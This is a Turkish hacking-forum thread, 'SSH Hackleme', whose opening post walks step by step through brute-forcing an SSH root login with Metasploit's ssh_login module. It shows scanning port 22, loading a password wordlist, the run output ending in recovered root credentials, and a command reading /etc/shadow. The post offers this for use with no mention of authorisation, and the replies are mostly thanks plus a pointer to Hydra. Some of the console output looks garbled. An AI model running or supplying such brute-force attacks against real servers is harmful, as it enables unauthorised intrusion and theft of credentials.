SSH Hackleme (1 Viewer)

[Tekno-Fatih]

root@kali:~# service postgresql start

Metasploit servisimizi başlatalım.

Şimdi msfconsole'yi açalım.

Kod:
msfconsole
Kod:
msf> db_status
msf > db_nmap -sS 192.168.122.1 -p 22

Sistemde 22. portun açık olup olmadığını kontrol etmek için 22 portunu yazdık.

Kod:
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 14:01 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
[*] Nmap: 22/tcp open ssh

22. portumuzun açık olduğunu öğrendik.

Kod:
msf > search ssh

Kod:
auxiliary/scanner/ssh/ssh_login normal SSH Login CheckScanner

Evet arkadaşlar, bulduk: auxiliary/scanner/ssh/ssh_login aşşağıdaki kodları takip edin.

Kod:
msf > use auxiliary/scanner/ssh/ssh_login

Modulümüzü seçtik arkadaşlar şimdi ayarlara bakalım.


Kod:
Module options (auxiliary/scanner/ssh/ssh_login):


Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts


Şimdi burada vermiş olduğum ayarları uygulayın aynısını yapınız.


Kod:
msf auxiliary(ssh_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1


Hedefin IP'si rhost demektir.

Kod:
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Yukarıda /unix_passwords.txt yazdığım yere sizin wordlistinizin adını yazınız.

Kod:
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root

kullanıcı adını root olarak belirledik. Şifrelerimiz wordlist halinde hazır konumda arkadaşlar şimdi başlayalım.

Kod:
msf auxiliary(ssh_login) > run
Run komutu ile yazdıklarımızı çalışır hale getirdik.

Kod:
[*] 192.168.122.1:22 SSH - Starting bruteforce
[-] 192.168.122.1:22 SSH - Failed: 'root:123456'
[-] 192.168.122.1:22 SSH - Failed: 'root:12345'
[-] 192.168.122.1:22 SSH - Failed: 'root:123456789'
[-] 192.168.122.1:22 SSH - Failed: 'rootassword'
[-] 192.168.122.1:22 SSH - Failed: 'root:iloveyou'
[+] 192.168.122.1:22 SSH - Success: 'root:adminpasswd' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux meru.mycompany.com 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(ssh_login) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)

msf auxiliary(ssh_login) > cat /etc/shadow
[+] 192.168.122.1:22 SSH - Success: 'root:adminpasswd' 'uid=0(root) gid=0(root) groups=0(root)


Başarı ile sonuçlandı brute işlemi arkadaşlar artık ssh sizin . root kullanıcı adı adminpasswd şifremizdir.

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[White]

[Hidden content]

eline sağlık

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tekno-Fatih]

eline sağlık

Eyvallah

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Beloved]

ek olarak hydra ilede brute yapılabilir tabi eskisi kadar stabil çalışmıyor ama bu konu güzel eline sağlık

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tekno-Fatih]

ek olarak hydra ilede brute yapılabilir tabi eskisi kadar stabil çalışmıyor ama bu konu güzel eline sağlık

Eyvallah dostum

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[N1C3B00T]

[Hidden content]

Es

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[fruuxe]

[Hidden content]

Bklm

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tekno-Fatih]

Es

Eyw

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tron]

[Hidden content]

Eline sağlık daha önceden paylaşmıştım konuyu

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tekno-Fatih]

Eyvallah dostum

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[KarooNz]

[Hidden content]

es

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tekno-Fatih]

es

Eyvallah dostum

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[ParZ]

ssee

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[DOGAN G.]

Bakıyım mı?

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[lryxn]

teşekkürler..

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[DOGAN G.]

, bundan sonra daha güzel konular bekleriz

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Üye silindi 59179]

Whoever seeks will always find, thanks for sharing info, bro!

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat